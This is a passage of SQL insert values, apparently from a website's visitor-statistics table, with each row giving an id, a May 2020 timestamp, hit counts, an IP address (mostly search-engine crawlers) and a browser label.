1590398135,1,1,0,0,'17.58.99.7','other'),(508311,1590398332,8,8,0,0,'77.120.98.235','other'),(508312,1590399943,1,1,0,0,'213.108.44.56','chrome'),(508313,1590400274,1,1,0,0,'178.154.200.216','other'),(508314,1590400753,1,1,0,0,'18.216.174.165','chrome'),(508315,1590400957,8,8,0,0,'77.120.98.235','other'),(508316,1590401231,1,1,0,0,'213.108.44.56','chrome'),(508317,1590401767,1,1,0,0,'66.249.70.72','chrome'),(508318,1590401900,2,2,0,0,'66.249.64.38','chrome'),(508319,1590401955,1,1,0,0,'207.46.13.55','other'),(508320,1590402006,1,1,0,0,'66.249.70.70','chrome'),(508321,1590402619,1,1,0,0,'178.154.200.222','other'),(508322,1590402943,1,1,0,0,'31.43.31.159','chrome'),(508323,1590403122,1,1,0,0,'66.249.70.70','chrome'),(508324,1590403182,1,1,0,0,'66.249.70.72','chrome'),(508325,1590403527,1,1,0,0,'213.180.203.95','other'),(508326,1590404120,1,1,0,0,'178.154.200.222','other'),(508327,1590404826,1,1,0,0,'109.74.154.72','chrome'),(508328,1590405509,2,2,0,0,'17.58.99.7','other'),(508329,1590407181,2,2,0,0,'207.46.13.55','other'),(508330,1590407422,1,1,0,0,'66.249.64.36','chrome'),(508331,1590407427,1,1,0,0,'66.249.70.70','chrome'),(508332,1590407925,2,2,0,0,'8.29.198.27','other'),(508333,1590407980,2,2,0,0,'66.249.70.72','chrome'),(508334,1590408012,1,1,0,0,'178.154.200.220','other'),(508335,1590408272,1,1,0,0,'188.32.99.73','chrome'),(508336,1590408635,1,1,0,0,'46.211.8.118','chrome'),(508337,1590409224,1,1,0,0,'178.154.200.236','other'),(508338,1590409346,2,2,0,0,'173.252.111.2','other'),(508340,1590409347,1,1,0,0,'173.252.111.17','other'),(508341,1590409391,1,1,0,0,'207.46.13.55','other'),(508342,1590409395,1,1,0,0,'173.252.111.5','other'),(508343,1590409396,1,1,0,0,'173.252.111.4','other'),(508344,1590409399,1,1,0,0,'192.71.12.140','other'),(508345,1590409785,1,1,0,0,'66.249.64.38','chrome'),(508346,1590409938,3,3,0,0,'66.249.70.72','chrome'),(508347,1590409982,1,1,0,0,'17.58.99.7','other'),(508348,1590409992,8,8,0,0,'77.120.98.235','other'),(508349,1590410603,1,0,1,0,'66.249.70.69',''),(508350,1590411659,1,1,0,0,'91.196.178.188','chrome'),(508351,1590411758,1,1,0,0,'66.249.70.69','chrome'),(508352,1590412379,1,1,0,0,'213.180.203.107','other'),(508353,1590412734,1,1,0,0,'17.58.99.7','other'),(508354,1590412863,3,3,0,0,'66.249.70.70','chrome'),(508355,1590412886,1,1,0,0,'66.249.70.69','chrome'),(508356,1590413118,1,1,0,0,'5.196.92.91','firefox'),(508357,1590413213,2,2,0,0,'157.55.39.155','other'),(508358,1590413220,1,1,0,0,'91.196.178.21','chrome'),(508359,1590413421,1,1,0,0,'213.180.203.16','other'),(508360,1590413503,2,2,0,0,'207.46.13.55','other'),(508361,1590414625,3,3,0,0,'66.249.70.69','chrome'),(508362,1590414924,1,1,0,0,'157.55.39.158','other'),(508363,1590414978,1,1,0,0,'66.249.70.72','chrome'),(508364,1590414988,2,2,0,0,'66.249.64.38','chrome'),(508365,1590415001,4,4,0,0,'66.249.70.70','chrome'),(508366,1590415109,1,1,0,0,'66.249.64.33','chrome'),(508367,1590415556,2,2,0,0,'66.249.70.69','chrome'),(508368,1590416370,1,1,0,0,'66.249.70.72','chrome'),(508369,1590416692,1,1,0,0,'178.154.200.97','other'),(508370,1590417243,1,1,0,0,'91.196.178.66','firefox'),(508371,1590417336,1,1,0,0,'66.249.70.69','chrome'),(508372,1590418067,1,1,0,0,'66.249.64.33','chrome'),(508373,1590418193,1,1,0,0,'66.249.70.70','chrome'),(508374,1590418239,1,1,0,0,'91.142.175.25','chrome'),(508375,1590418630,1,1,0,0,'66.249.64.38','chrome'),(508376,1590418662,1,1,0,0,'178.154.200.222','other'),(508377,1590418752,1,1,0,0,'8.29.198.26','other'),(508378,1590418904,1,1,0,0,'178.154.200.220','other'),(508379,1590418922,1,1,0,0,'213.180.203.16','other'),(508380,1590419022,1,1,0,0,'8.29.198.25','other'),(508381,1590419576,2,2,0,0,'66.249.70.69','chrome'),(508382,1590419593,1,1,0,0,'91.196.178.189','other'),(508383,1590419621,2,2,0,0,'66.249.70.72','chrome'),(508384,1590419873,8,8,0,0,'77.120.98.235','other'),(508385,1590419964,1,1,0,0,'66.249.70.70','chrome'),(508386,1590420650,1,1,0,0,'178.154.200.119','other'),(508387,1590420673,1,1,0,0,'188.163.18.153','chrome'),(508388,1590420981,1,1,0,0,'157.55.39.158','other'),(508389,1590421461,1,1,0,0,'207.46.13.80','other'),(508390,1590421482,1,1,0,0,'66.249.70.72','chrome'),(508391,1590421688,2,2,0,0,'66.249.70.70','chrome'),(508392,1590421698,1,1,0,0,'178.154.200.41','other'),(508393,1590422189,1,1,0,0,'66.249.64.33','chrome'),(508394,1590423026,2,2,0,0,'66.249.70.70','chrome'),(508395,1590423136,8,8,0,0,'77.120.98.235','other'),(508396,1590423758,1,1,0,0,'66.249.70.69','chrome'),(508397,1590423847,1,1,0,0,'213.180.203.140','other'),(508398,1590424282,1,1,0,0,'178.154.200.220','other'),(508399,1590424302,1,1,0,0,'213.180.203.16','other'),(508400,1590424580,1,1,0,0,'92.113.175.99','chrome'),(508401,1590424999,1,1,0,0,'178.154.200.114','other'),(508402,1590425129,1,1,0,0,'178.154.200.97','other'),(508403,1590425140,1,1,0,0,'66.249.70.72','chrome'),(508404,1590425292,4,4,0,0,'66.249.70.70','chrome'),(508405,1590425550,1,1,0,0,'213.180.203.81','other'),(508406,1590425559,2,2,0,0,'77.123.14.147','other'),(508407,1590425780,1,1,0,0,'178.92.121.139','firefox'),(508408,1590426071,8,8,0,0,'77.120.98.235','other'),(508409,1590426345,1,1,0,0,'207.46.13.80','other'),(508410,1590426546,1,1,0,0,'178.154.200.185','other'),(508411,1590426565,3,3,0,0,'66.249.70.72','chrome'),(508412,1590426860,1,1,0,0,'157.55.39.158','other'),(508413,1590427048,1,1,0,0,'66.249.70.69','chrome'),(508414,1590427230,1,1,0,0,'178.154.200.220','other'),(508415,1590427408,2,2,0,0,'66.249.70.70','chrome'),(508416,1590428412,2,2,0,0,'207.46.13.80','other'),(508417,1590428701,1,1,0,0,'213.180.203.16','other'),(508418,1590428753,8,8,0,0,'77.120.98.235','other'),(508419,1590428783,1,1,0,0,'66.249.64.33','chrome'),(508420,1590428816,1,1,0,0,'66.249.70.72','chrome'),(508421,1590429414,1,1,0,0,'178.154.200.220','other'),(508422,1590429465,2,2,0,0,'157.55.39.158','other'),(508423,1590429578,1,1,0,0,'178.154.200.196','other'),(508424,1590429582,1,1,0,0,'8.29.198.27','other'),(508425,1590429845,1,1,0,0,'8.29.198.26','other'),(508426,1590429875,1,1,0,0,'178.154.200.87','other'),(508427,1590430211,2,2,0,0,'66.249.70.70','chrome'),(508428,1590430601,1,1,0,0,'193.0.206.218','chrome'),(508429,1590431260,8,8,0,0,'77.120.98.235','other'),(508430,1590431543,1,1,0,0,'157.55.39.158','other'),(508431,1590432788,2,2,0,0,'17.58.99.7','other'),(508432,1590433270,8,8,0,0,'77.120.98.235','other'),(508433,1590433620,1,1,0,0,'84.17.46.180','other'),(508434,1590433971,2,2,0,0,'178.154.200.220','other'),(508435,1590434274,8,8,0,0,'77.120.98.235','other'),(508436,1590435147,1,1,0,0,'88.155.52.94','chrome'),(508437,1590435263,1,1,0,0,'157.55.39.158','other'),(508438,1590435378,1,1,0,0,'66.249.70.69','chrome'),(508439,1590435769,1,1,0,0,'66.249.70.72','chrome'),(508440,1590436378,1,1,0,0,'178.154.200.220','other'),(508441,1590436429,8,8,0,0,'77.120.98.235','other'),(508442,1590436902,1,1,0,0,'66.249.70.69','chrome'),(508443,1590437345,1,1,0,0,'157.55.39.158','other'),(508444,1590437455,1,1,0,0,'66.249.70.72','chrome'),(508445,1590437609,1,1,0,0,'207.46.13.234','other'),(508446,1590438295,1,1,0,0,'66.249.70.69','chrome'),(508447,1590438469,1,1,0,0,'157.55.39.158','other'),(508448,1590438727,1,1,0,0,'34.216.12.116','chrome'),(508449,1590438779,8,8,0,0,'77.120.98.235','other'),(508450,1590438848,1,1,0,0,'17.58.99.7','other'),(508451,1590438907,2,2,0,0,'95.213.141.126','opera'),(508452,1590438920,1,1,0,0,'66.249.70.70','chrome'),(508453,1590439504,1,1,0,0,'157.55.39.53','other'),(508454,1590439796,1,1,0,0,'91.196.178.163','chrome'),(508455,1590440324,1,1,0,0,'178.154.200.175','other'),(508456,1590440410,1,1,0,0,'8.29.198.26','other'),(508457,1590440672,1,1,0,0,'8.29.198.25','other'),(508458,1590440860,2,2,0,0,'66.249.70.72','chrome'),(508459,1590440932,1,1,0,0,'66.249.70.69','chrome'),(508460,1590440991,1,1,0,0,'157.55.39.53','other'),(508461,1590441003,1,1,0,0,'157.55.39.158','other'),(508462,1590441121,8,8,0,0,'77.120.98.235','other'),(508463,1590441492,1,1,0,0,'66.249.70.70','chrome'),(508464,1590442216,1,1,0,0,'66.249.70.69','chrome'),(508465,1590442283,2,2,0,0,'52.11.209.75','chrome'),(508466,1590442515,1,1,0,0,'66.249.64.36','chrome'),(508467,1590442662,1,1,0,0,'157.55.39.158','other'),(508468,1590443465,8,8,0,0,'77.120.98.235','other'),(508469,1590444193,1,1,0,0,'66.249.64.33','chrome'),(508470,1590444362,2,2,0,0,'66.249.70.69','chrome'),(508471,1590444424,1,0,1,0,'66.249.70.72',''),(508472,1590444847,1,1,0,0,'207.46.13.234','other'),(508473,1590445641,1,1,0,0,'178.154.200.216','other'),(508474,1590445751,1,1,0,0,'66.249.70.70','chrome'),(508475,1590445836,8,8,0,0,'77.120.98.235','other'),(508476,1590446236,1,1,0,0,'157.55.39.158','other'),(508477,1590446450,1,1,0,0,'178.154.200.222','other'),(508478,1590446494,1,1,0,0,'207.46.13.80','other'),(508479,1590446768,1,1,0,0,'178.154.200.67','other'),(508480,1590447392,2,2,0,0,'178.154.200.222','other'),(508481,1590447894,1,1,0,0,'213.180.203.16','other'),(508482,1590448069,8,8,0,0,'77.120.98.235','other'),(508483,1590448093,1,1,0,0,'157.55.39.53','other'),(508484,1590448176,1,1,0,0,'94.130.71.60','other'),(508485,1590448763,1,1,0,0,'66.249.70.70','chrome'),(508486,1590448847,2,2,0,0,'66.249.70.72','chrome'),(508487,1590448961,1,1,0,0,'207.46.13.234','other'),(508488,1590449778,1,1,0,0,'213.180.203.16','other'),(508489,1590449816,1,1,0,0,'207.46.13.80','other'),(508490,1590450113,1,1,0,0,'66.249.70.72','chrome'),(508491,1590450244,8,8,0,0,'77.120.98.235','other'),(508492,1590450394,1,1,0,0,'17.58.99.7','other'),(508493,1590450489,2,2,0,0,'157.55.39.53','other'),(508494,1590450690,1,1,0,0,'66.249.70.70','chrome'),(508495,1590450906,1,1,0,0,'62.205.134.182','other'),(508496,1590451141,1,1,0,0,'213.180.203.140','other'),(508497,1590451233,1,1,0,0,'8.29.198.25','other'),(508498,1590451495,1,1,0,0,'8.29.198.27','other'),(508499,1590451940,2,2,0,0,'66.249.70.72','chrome'),(508500,1590452245,1,1,0,0,'66.249.70.69','chrome'),(508501,1590452504,1,1,0,0,'66.249.64.33','chrome'),(508502,1590452506,8,8,0,0,'77.120.98.235','other'),(508503,1590452919,1,1,0,0,'178.154.200.114','other'),(508504,1590453812,1,1,0,0,'66.249.70.70','chrome'),(508505,1590453894,1,1,0,0,'178.154.200.220','other'),(508506,1590454282,2,2,0,0,'178.154.200.222','other'),(508507,1590454709,1,1,0,0,'66.249.64.33','chrome'),(508508,1590454726,2,2,0,0,'66.249.70.69','chrome'),(508509,1590454786,8,8,0,0,'77.120.98.235','other'),(508510,1590455197,1,1,0,0,'207.46.13.80','other'),(508511,1590455388,1,1,0,0,'178.154.200.97','other'),(508512,1590455466,1,1,0,0,'178.154.200.220','other'),(508513,1590455654,4,4,0,0,'66.249.70.70','chrome'),(508514,1590456105,1,1,0,0,'66.249.70.69','chrome'),(508515,1590456623,3,3,0,0,'66.249.70.70','chrome'),(508516,1590456628,1,1,0,0,'213.180.203.16','other'),(508517,1590456973,8,8,0,0,'77.120.98.235','other'),(508518,1590457096,1,1,0,0,'207.46.13.184','other'),(508519,1590457851,1,1,0,0,'213.180.203.16','other'),(508520,1590458052,1,1,0,0,'66.249.70.72','chrome'),(508521,1590458474,1,1,0,0,'66.249.70.69','chrome'),(508522,1590458738,1,0,1,0,'66.249.70.70',''),(508523,1590458975,1,1,0,0,'178.154.200.222','other'),(508524,1590459117,8,8,0,0,'77.120.98.235','other'),(508525,1590459433,2,2,0,0,'66.249.70.72','chrome'),(508526,1590459475,1,1,0,0,'66.249.70.70','chrome'),(508527,1590459725,1,1,0,0,'66.249.64.38','chrome'),(508528,1590460773,1,1,0,0,'47.115.54.160','firefox'),(508529,1590460890,2,2,0,0,'27.115.124.9','other'),(508530,1590460913,1,1,0,0,'27.115.124.10','chrome'),(508531,1590460915,1,1,0,0,'27.115.124.9','chrome'),(508532,1590461100,2,2,0,0,'66.249.70.69','chrome'),(508533,1590461278,8,8,0,0,'77.120.98.235','other'),(508534,1590461409,1,1,0,0,'178.154.200.236','other'),(508535,1590461416,1,1,0,0,'178.154.200.222','other'),(508536,1590461734,1,1,0,0,'213.180.203.142','other'),(508537,1590461810,2,2,0,0,'66.249.70.72','chrome'),(508538,1590461885,1,1,0,0,'213.180.203.101','other'),(508539,1590462058,2,2,0,0,'8.29.198.26','other'),(508540,1590462301,1,1,0,0,'207.46.13.184','other'),(508541,1590462505,1,1,0,0,'178.154.200.222','other'),(508542,1590462778,1,1,0,0,'213.180.203.90','other'),(508543,1590462877,2,2,0,0,'66.249.70.70','chrome'),(508544,1590463483,8,8,0,0,'77.120.98.235','other'),(508545,1590463497,4,4,0,0,'66.249.70.72','chrome'),(508546,1590463857,1,1,0,0,'88.155.180.147','other'),(508547,1590464087,1,1,0,0,'66.249.70.70','chrome'),(508548,1590464477,1,1,0,0,'17.58.99.7','other'),(508549,1590464799,3,3,0,0,'66.249.70.72','chrome'),(508550,1590464846,1,1,0,0,'207.46.13.184','other'),(508551,1590465110,1,1,0,0,'178.154.200.191','other'),(508552,1590465350,2,2,0,0,'66.249.70.69','chrome'),(508553,1590465625,8,8,0,0,'77.120.98.235','other'),(508554,1590465821,1,1,0,0,'46.211.62.102','other'),(508555,1590465956,1,1,0,0,'66.249.70.72','chrome'),(508556,1590465971,1,1,0,0,'178.154.200.222','other'),(508557,1590466339,1,1,0,0,'66.249.64.33','chrome'),(508558,1590466341,1,1,0,0,'66.249.70.70','chrome'),(508559,1590466472,3,3,0,0,'66.249.70.69','chrome'),(508560,1590467858,1,1,0,0,'66.249.70.69','chrome'),(508561,1590467867,8,8,0,0,'77.120.98.235','other'),(508562,1590467921,1,1,0,0,'66.249.70.72','chrome'),(508563,1590467937,1,1,0,0,'157.55.39.253','other'),(508564,1590468239,1,1,0,0,'213.180.203.16','other'),(508565,1590468361,1,1,0,0,'62.205.134.182','other'),(508566,1590468795,1,1,0,0,'66.249.70.69','chrome'),(508567,1590468847,2,2,0,0,'66.249.70.70','chrome'),(508568,1590469942,1,1,0,0,'66.249.64.33','chrome'),(508569,1590469959,1,1,0,0,'66.249.70.69','chrome'),(508570,1590470104,8,8,0,0,'77.120.98.235','other'),(508571,1590470278,2,2,0,0,'66.249.70.70','chrome'),(508572,1590470350,1,1,0,0,'91.196.178.70','chrome'),(508573,1590470583,1,1,0,0,'66.249.64.38','chrome'),(508574,1590470588,1,1,0,0,'66.249.70.72','chrome'),(508575,1590470672,1,1,0,0,'157.55.39.162','other'),(508576,1590470856,1,1,0,0,'17.58.99.7','other'),(508577,1590470911,1,1,0,0,'2.47.39.211','other'),(508578,1590471429,1,1,0,0,'66.249.70.69','chrome'),(508579,1590471434,1,1,0,0,'178.154.200.222','other'),(508581,1590471718,1,1,0,0,'66.249.70.70','chrome'),(508582,1590472166,2,2,0,0,'66.249.64.33','chrome'),(508583,1590472331,8,8,0,0,'77.120.98.235','other'),(508584,1590472494,1,1,0,0,'66.249.70.72','chrome'),(508585,1590472605,1,1,0,0,'178.154.200.222','other'),(508586,1590472838,1,1,0,0,'194.61.24.94','other'),(508587,1590472881,1,1,0,0,'8.29.198.25','other'),(508588,1590473003,1,1,0,0,'157.55.39.253','other'),(508589,1590473135,1,1,0,0,'66.249.64.38','chrome'),(508590,1590473149,1,1,0,0,'8.29.198.26','other'),(508591,1590473308,2,2,0,0,'66.249.70.70','chrome'),(508592,1590474043,2,2,0,0,'66.249.64.38','chrome'),(508593,1590474228,3,3,0,0,'66.249.70.69','chrome'),(508594,1590474609,8,8,0,0,'77.120.98.235','other'),(508595,1590474679,4,4,0,0,'66.249.70.70','chrome'),(508596,1590476062,2,2,0,0,'66.249.70.69','chrome'),(508597,1590476067,2,2,0,0,'66.249.70.70','chrome'),(508598,1590476396,1,1,0,0,'209.17.96.34','other'),(508599,1590476433,2,2,0,0,'66.249.64.33','chrome'),(508600,1590476438,1,1,0,0,'66.249.64.36','chrome'),(508601,1590476551,2,2,0,0,'93.94.66.0','chrome'),(508602,1590476596,1,1,0,0,'66.249.64.38','chrome'),(508603,1590476866,8,8,0,0,'77.120.98.235','other'),(508604,1590476929,1,1,0,0,'131.220.6.152','chrome'),(508605,1590476951,1,1,0,0,'66.249.70.72','chrome'),(508606,1590477051,1,1,0,0,'66.249.70.70','chrome'),(508607,1590477738,2,2,0,0,'157.55.39.162','other'),(508608,1590477824,1,1,0,0,'66.249.70.69','chrome'),(508609,1590477849,1,1,0,0,'157.55.39.144','other'),(508610,1590477854,1,1,0,0,'207.46.13.184','other'),(508611,1590477981,1,1,0,0,'91.142.175.25','chrome'),(508612,1590478319,2,2,0,0,'66.249.64.36','chrome'),(508613,1590478492,1,1,0,0,'66.249.64.38','chrome'),(508614,1590478535,1,1,0,0,'91.196.178.187','chrome'),(508615,1590479063,1,1,0,0,'66.249.70.69','chrome'),(508616,1590479164,8,8,0,0,'77.120.98.235','other'),(508617,1590479182,2,2,0,0,'66.249.70.70','chrome'),(508618,1590479363,1,1,0,0,'66.249.64.33','chrome'),(508619,1590479374,2,2,0,0,'66.249.70.72','chrome'),(508620,1590480438,1,1,0,0,'66.249.70.70','chrome'),(508621,1590480531,2,2,0,0,'207.46.13.184','other'),(508622,1590480853,2,2,0,0,'66.249.70.72','chrome'),(508623,1590480956,1,1,0,0,'66.249.64.36','chrome'),(508624,1590481084,1,1,0,0,'77.222.145.82','chrome'),(508625,1590481399,8,8,0,0,'77.120.98.235','other'),(508626,1590481412,1,1,0,0,'66.249.70.69','chrome'),(508627,1590482556,1,1,0,0,'66.249.70.72','chrome'),(508628,1590482644,3,3,0,0,'66.249.70.70','chrome'),(508629,1590483110,1,0,1,0,'66.249.64.38',''),(508630,1590483252,1,1,0,0,'157.55.39.144','other'),(508631,1590483400,1,1,0,0,'66.249.70.69','chrome'),(508632,1590483647,1,1,0,0,'66.249.70.72','chrome'),(508633,1590483659,1,1,0,0,'66.249.64.36','chrome'),(508634,1590483709,1,1,0,0,'8.29.198.27','other'),(508635,1590483763,8,8,0,0,'77.120.98.235','other'),(508636,1590483848,1,1,0,0,'17.58.99.7','other'),(508637,1590483978,1,1,0,0,'8.29.198.25','other'),(508638,1590484434,1,1,0,0,'66.249.70.69','chrome'),(508639,1590484762,2,2,0,0,'66.249.70.70','chrome'),(508640,1590485996,1,1,0,0,'66.249.70.69','chrome'),(508641,1590485997,4,4,0,0,'66.249.70.70','chrome'),(508642,1590485999,4,4,0,0,'66.249.70.72','chrome'),(508643,1590486040,1,1,0,0,'17.58.99.7','other'),(508644,1590486211,8,8,0,0,'77.120.98.235','other'),(508645,1590487087,3,3,0,0,'157.55.39.162','other'),(508646,1590487140,4,4,0,0,'66.249.70.69','chrome'),(508647,1590487228,1,1,0,0,'66.249.64.36','chrome'),(508648,1590487252,1,1,0,0,'17.58.99.7','other'),(508649,1590487758,1,1,0,0,'66.249.64.33','chrome'),(508650,1590488035,2,2,0,0,'157.55.39.162','other'),(508651,1590488040,2,2,0,0,'176.97.1.8','other'),(508652,1590488305,1,1,0,0,'91.196.178.174','chrome'),(508653,1590488486,1,1,0,0,'100.24.126.2','chrome'),(508654,1590488608,8,8,0,0,'77.120.98.235','other'),(508655,1590488966,1,1,0,0,'66.249.70.72','chrome'),(508656,1590489360,1,1,0,0,'207.46.13.184','other'),(508657,1590489476,1,1,0,0,'66.249.70.69','chrome'),(508658,1590489482,1,1,0,0,'66.249.70.70','chrome'),(508659,1590489635,1,1,0,0,'66.249.64.38','chrome'),(508660,1590490017,1,1,0,0,'66.249.64.36','chrome'),(508661,1590490205,2,2,0,0,'46.211.241.200','chrome'),(508662,1590490594,2,2,0,0,'66.249.70.69','chrome'),(508663,1590490843,1,1,0,0,'66.249.64.38','chrome'),(508664,1590490950,1,1,0,0,'66.249.70.70','chrome'),(508665,1590491065,1,1,0,0,'109.74.154.72','chrome'),(508666,1590491076,8,8,0,0,'77.120.98.235','other'),(508667,1590491342,2,2,0,0,'66.249.70.72','chrome'),(508668,1590491845,2,2,0,0,'66.249.70.69','chrome'),(508669,1590492149,2,2,0,0,'66.249.64.36','chrome'),(508670,1590492655,2,2,0,0,'66.249.70.70','chrome'),(508671,1590492997,2,2,0,0,'66.249.70.72','chrome'),(508672,1590493097,3,3,0,0,'88.155.34.115','chrome'),(508673,1590493363,1,1,0,0,'157.55.39.162','other'),(508674,1590493570,7,7,0,0,'3.235.172.213','other'),(508675,1590493645,3,3,0,0,'66.249.70.70','chrome'),(508676,1590493746,8,8,0,0,'77.120.98.235','other'),(508677,1590494240,1,1,0,0,'207.46.13.184','other'),(508678,1590494263,1,1,0,0,'88.155.34.115','chrome'),(508679,1590494497,8,8,0,0,'3.235.172.213','other'),(508680,1590494538,2,2,0,0,'8.29.198.27','other'),(508681,1590494893,1,1,0,0,'95.132.41.255','chrome'),(508682,1590495408,1,1,0,0,'66.249.70.72','chrome'),(508683,1590495410,1,1,0,0,'66.249.70.69','chrome'),(508684,1590495421,8,8,0,0,'3.235.172.213','other'),(508685,1590495763,2,2,0,0,'66.249.70.70','chrome'),(508686,1590495900,1,1,0,0,'31.43.13.146','chrome'),(508687,1590496377,5,5,0,0,'3.235.172.213','other'),(508688,1590496413,1,1,0,0,'66.249.64.38','chrome'),(508689,1590496435,1,1,0,0,'66.249.64.36','chrome'),(508690,1590496678,1,1,0,0,'91.196.178.21','chrome'),(508691,1590496823,1,1,0,0,'66.249.70.72','chrome'),(508692,1590497065,1,1,0,0,'66.249.64.33','chrome'),(508693,1590497163,8,8,0,0,'77.120.98.235','other'),(508694,1590497292,1,1,0,0,'66.249.70.70','chrome'),(508695,1590497437,8,8,0,0,'3.235.172.213','other'),(508696,1590497643,3,3,0,0,'66.249.70.69','chrome'),(508697,1590497784,3,3,0,0,'207.46.13.184','other'),(508698,1590498003,1,1,0,0,'66.249.64.33','chrome'),(508699,1590498516,1,0,1,0,'66.249.70.70',''),(508700,1590498620,1,1,0,0,'91.196.177.147','chrome'),(508701,1590498776,11,11,0,0,'3.235.172.213','other'),(508702,1590498853,2,2,0,0,'66.249.70.70','chrome'),(508703,1590498870,1,1,0,0,'66.249.70.69','chrome'),(508704,1590498993,1,1,0,0,'66.249.70.72','chrome'),(508705,1590499826,2,2,0,0,'66.249.64.38','chrome'),(508706,1590499911,6,6,0,0,'3.235.172.213','other'),(508707,1590499916,2,2,0,0,'66.249.70.69','chrome'),(508708,1590499999,1,1,0,0,'207.46.13.184','other'),(508709,1590500028,1,1,0,0,'66.249.70.72','chrome'),(508710,1590500124,2,2,0,0,'66.249.70.70','chrome'),(508711,1590500180,1,1,0,0,'66.249.64.36','chrome'),(508712,1590500315,1,1,0,0,'66.249.64.33','chrome'),(508713,1590500584,2,2,0,0,'91.196.178.88','firefox'),(508714,1590500948,3,3,0,0,'3.235.172.213','other'),(508715,1590501051,1,1,0,0,'66.249.70.69','chrome'),(508716,1590501219,8,8,0,0,'77.120.98.235','other'),(508717,1590501666,1,1,0,0,'207.46.13.184','other'),(508718,1590501999,1,1,0,0,'91.196.177.46','chrome'),(508719,1590502274,1,1,0,0,'91.209.11.236','other'),(508720,1590502937,1,1,0,0,'91.196.177.46','chrome'),(508721,1590504262,3,3,0,0,'66.249.70.70','chrome'),(508722,1590504386,1,1,0,0,'66.249.64.36','chrome'),(508723,1590504481,1,1,0,0,'66.249.70.69','chrome'),(508724,1590505352,2,2,0,0,'66.249.70.70','chrome'),(508725,1590505362,1,1,0,0,'8.29.198.26','other'),(508726,1590505468,8,8,0,0,'77.120.98.235','other'),(508727,1590505631,1,1,0,0,'8.29.198.25','other'),(508728,1590505782,1,1,0,0,'178.154.200.241','other'),(508729,1590507191,1,1,0,0,'213.180.203.148','other'),(508730,1590507477,1,0,1,0,'66.249.70.72',''),(508731,1590509163,1,1,0,0,'157.55.39.211','other'),(508732,1590509524,1,1,0,0,'66.249.70.70','chrome'),(508733,1590509615,8,8,0,0,'77.120.98.235','other'),(508734,1590509662,1,1,0,0,'13.66.139.0','other'),(508735,1590510203,2,2,0,0,'66.249.70.69','chrome'),(508736,1590510587,1,1,0,0,'66.249.70.72','chrome'),(508737,1590510638,2,2,0,0,'66.249.70.70','chrome'),(508738,1590510789,1,1,0,0,'178.154.200.112','other'),(508739,1590511183,3,3,0,0,'66.249.70.69','chrome'),(508740,1590511637,2,2,0,0,'52.38.92.134','chrome'),(508741,1590512195,1,1,0,0,'178.154.200.155','other'),(508742,1590512199,1,1,0,0,'213.180.203.101','other'),(508743,1590512915,2,2,0,0,'66.249.70.69','chrome'),(508744,1590512917,1,1,0,0,'95.216.15.49','other'),(508745,1590513077,1,1,0,0,'66.249.70.70','chrome'),(508746,1590513133,3,3,0,0,'66.249.70.72','chrome'),(508747,1590513617,1,1,0,0,'157.55.39.211','other'),(508748,1590514063,8,8,0,0,'77.120.98.235','other'),(508749,1590514497,1,1,0,0,'213.180.203.148','other'),(508750,1590514758,1,1,0,0,'38.99.62.88','other'),(508751,1590515135,2,2,0,0,'66.249.70.72','chrome'),(508752,1590515597,1,1,0,0,'37.73.171.95','chrome'),(508753,1590515918,1,1,0,0,'66.249.70.69','chrome'),(508754,1590516170,1,1,0,0,'66.249.70.72','chrome'),(508755,1590516206,1,1,0,0,'8.29.198.26','other'),(508756,1590516456,1,1,0,0,'8.29.198.25','other'),(508757,1590516595,1,1,0,0,'17.58.99.7','other'),(508758,1590517654,1,1,0,0,'66.249.70.70','chrome'),(508759,1590517947,2,2,0,0,'157.55.39.22','other'),(508760,1590518914,8,8,0,0,'77.120.98.235','other'),(508761,1590519284,2,2,0,0,'66.249.70.69','chrome'),(508762,1590519532,1,1,0,0,'66.249.64.36','chrome'),(508763,1590520246,1,1,0,0,'91.196.178.84','firefox'),(508764,1590520252,1,0,1,0,'66.249.64.33',''),(508765,1590520255,1,1,0,0,'66.102.9.164','chrome'),(508766,1590520336,1,1,0,0,'66.249.70.72','chrome'),(508767,1590520357,2,2,0,0,'17.58.99.7','other'),(508768,1590520403,1,1,0,0,'66.249.70.69','chrome'),(508769,1590520676,2,2,0,0,'66.249.70.70','chrome'),(508770,1590520837,2,2,0,0,'66.249.64.36','chrome'),(508771,1590521101,1,1,0,0,'66.249.64.33','chrome'),(508772,1590521167,1,1,0,0,'107.21.1.8','other'),(508773,1590521168,1,1,0,0,'54.208.102.37','other'),(508774,1590521322,1,1,0,0,'178.154.200.106','other'),(508775,1590521364,3,3,0,0,'66.249.70.72','chrome'),(508776,1590521853,1,1,0,0,'66.249.70.70','chrome'),(508777,1590522118,1,1,0,0,'66.249.64.36','chrome'),(508778,1590522363,1,1,0,0,'13.66.139.0','other'),(508779,1590522456,1,1,0,0,'91.196.178.157','firefox'),(508780,1590522495,1,0,1,0,'66.249.70.69',''),(508781,1590522523,1,1,0,0,'178.127.48.136','chrome'),(508782,1590522873,1,0,1,0,'84.17.59.70',''),(508783,1590522890,1,1,0,0,'94.153.75.199','chrome'),(508784,1590523215,1,1,0,0,'101.4.60.64','chrome'),(508785,1590523310,1,1,0,0,'66.249.70.69','chrome'),(508786,1590523765,2,2,0,0,'66.249.70.70','chrome'),(508787,1590523886,8,8,0,0,'77.120.98.235','other'),(508788,1590523908,1,1,0,0,'13.66.139.0','other'),(508789,1590524182,1,1,0,0,'193.106.30.99','firefox'),(508790,1590524260,3,3,0,0,'66.249.70.72','chrome'),(508791,1590524530,1,1,0,0,'66.249.70.69','chrome'),(508792,1590524839,1,1,0,0,'66.249.64.33','chrome'),(508793,1590524841,1,1,0,0,'13.66.139.0','other'),(508794,1590525242,1,1,0,0,'157.55.39.22','other'),(508795,1590526351,5,5,0,0,'66.249.70.70','chrome'),(508796,1590526548,1,1,0,0,'66.249.64.33','chrome'),(508797,1590526555,3,3,0,0,'66.249.70.69','chrome'),(508798,1590527040,1,1,0,0,'8.29.198.26','other'),(508799,1590527268,1,1,0,0,'66.249.75.200','chrome'),(508800,1590527286,1,1,0,0,'8.29.198.25','other'),(508801,1590527318,2,2,0,0,'66.249.70.72','chrome'),(508802,1590527712,3,2,1,0,'66.249.70.70',''),(508803,1590528101,1,1,0,0,'196.240.57.172','msie'),(508804,1590528156,2,2,0,0,'66.249.70.69','chrome'),(508805,1590528443,2,2,0,0,'66.249.70.72','chrome'),(508806,1590528786,2,2,0,0,'66.249.70.70','chrome'),(508807,1590528864,8,8,0,0,'77.120.98.235','other'),(508808,1590529263,1,1,0,0,'66.249.70.69','chrome'),(508809,1590529561,3,3,0,0,'66.249.70.72','chrome'),(508810,1590529696,1,1,0,0,'66.249.70.70','chrome'),(508811,1590530321,1,1,0,0,'66.249.6